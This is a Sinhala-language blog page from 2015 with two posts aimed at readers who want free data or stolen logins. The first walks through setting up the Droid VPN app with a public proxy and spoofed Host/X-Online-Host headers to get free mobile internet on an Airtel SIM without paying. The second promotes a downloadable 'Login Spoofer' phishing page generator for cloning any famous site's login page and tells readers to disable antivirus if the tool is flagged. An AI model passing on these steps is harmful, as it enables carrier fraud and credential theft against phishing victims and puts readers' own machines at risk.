Direct Link:


මුලින්ම ඔයාට  Droid VPN Site එකේ Account එකක් හදාගන්න වෙනව..ඒකට ඔය Link  එක Click කරන්න..

දැන් ඔය වගේ එකක් එයි
ඔය Form එක Fill කරල SING UP NOW Button එක Click කරන්න


ඊට පස්සෙ ඔයා ඔතන දාපු E-mail එකට Droid VPN  එකෙන් Conformation Email එකක් එයි..E-mail තියන Link එක Click කරල Account එක Conform කරගන්න.ඔන්න ලොකුම වැඩේ ඉවරයි 
දැන් ඔයාගෙ Phone එකේ Data On කරන්න..ඊට පස්සෙ App එක Open කරන්න..
ඊට පස්සෙ Settings වලට යන්න...

දැන් ඔය වගේ එකක් එයි...
ඔතනින් Connection Protocol කියන එකට ගිහින් TCP Select කරල Ok කරන්න


Port Settings ටික මේ විදිහට හදාගන්න

දැන් Proxy Settings එකට ගිහින් Enable Select කරල පහල Details ටික Add කරගන්න



Proxy Settings >> Enable
               Proxy Server -->>  195.189.123.1
 Port -->> 3128

මම ඔය  දාල තියන Proxy Server එක මම Use කරපු එක..ඒක හැමදාටම වලංගු නෑ..මෙන්න මේ Site එකට ගිහින් Port 3128 අදාල Proxy Address එකක් ‍තෝරගෙන proxy server කියන තැනට Add කරගන්න..

                                 Click Here To Get New Proxy Address

දැන් HTTP Headers එකට ගිහින් Enable Select කරල  මේ Code එක එතනට Add කරගෙන Ok කරන්න..
Code එකේ කිසිම වෙනසක් කරන්න එපා..

Host:125.21.246.99/vbctest/
X-Online-Host:125.21.246.99/vbctest/

දැන් වැඩ ටික ඔක්කොම හරි...
දැන් ඔයාගෙ Username එකයි Password  එකයි දීල Connect Button එක Click කරන්න...(App එක මැද තියෙන්නෙ)

ඔන්න ඔය විදිහට Connected කියල ව‍ටුනනම් හරි.හොදට Signal තියනවනම් විනාඩියක් යන්න කලින් Connect වෙයි.දැන් ඉතින් පාඩුවේ Free Internet යන්න...සල්ලි ,Data සතයක්වත් කැපෙන්නෙ නෑ...සල්ලි ,Data නැති Airtel Sim එකක් ගත්තනම් වඩා හොදයි..මේ Account එකෙන්  ඔයාට ඇති වෙනකන් Internet Use කරන්න පුලුවන් 3 month යනකන්..ඊට පස්සෙ අයෙත් අලුත් Account එකක් හදල යන්න තියෙන්නෙ...මන් මේක Check කරේ Airtel Sim එකකට විතරයි..ඔයාල අනිත් Sim වලටත් කරල බලන්න..

Posted By: Unknown on Thursday, October 8, 2015

Tuesday, October 6, 2015

ඕනම Site එකක් ලේසියෙන්ම Hack කරගන්න Hacking Tool එකක් මෙන්න.....

    ඕනම Site එකක් ලේසියෙන්ම Hack කරගන්න                          Hacking Tool එකක්

                                         



ඔන්න කිවුව විදිහටම  අද Hacking Tool එකක් අරගෙන ආව...ඕනම Famous Site එකක් Phishing ක්‍රමයට ලේසියෙන්ම Hack කරගන්න මෙන්න Phishing Page Generator එකක් මන් ගානෙ නොමිලේම...මේ Tool එකෙන් ඕනම Site එකකට Phishing Page එකක් විනාඩි 2න් හදාගන්න පුලුවන්...

මෙන්න Link එක..බාගෙනම බලන්න...


RAR Password එක බාගන්න



මෙන්න Hacking Tool එකේ Screen Shot එකක්..


File එක Extract කරගෙන Login Spoofer කියන Application එක Double Click කරන්න..Virus Guard එකෙන් ඇල්ලුවොත් ටිකකට එක Deactive කරල ඉන්න..බය වෙන්න එප..මොකුත් වෙන්නෙ නෑ..මමත් ඕක Use කරනව...
දැන් ඔයාට Hack කරන්න ඕන Site එකේ නම ඉස්සරහින් තියන select Button එක Select කරන්න...Output File එක Save කරන්න ඕන තැන Select කරල එක  Create The Fake Page Button එක Click කරන්න..දැන් ඔයාගෙ Phishing Page එක හදල ඉවරයි..දැන් ම්න් කලින් Post එකේ කියල දුන්න විදිහට වැඩේ කරගන්න...Phishing page එකක් හදන විදිහ ඒකෙන් Hack කරන විදිහයි කලින් Post එකේ කියල දුන්නනෙ..ඒක කරන්න තේරෙන්නෙ නැති අයට Video Tut  එකකුත් හදුව ඔන්න..දන්නෙ නැති අය Video Tut  එක බලල වැඩේ කරගන්න..










Posted By: Unknown on Tuesday, October 6, 2015

Contact Us

Name

Email *

Message *

 

Total Visitors

Flag Counter
Copyright@2014. PTC-World. All Rights Reserved.
Designed by :-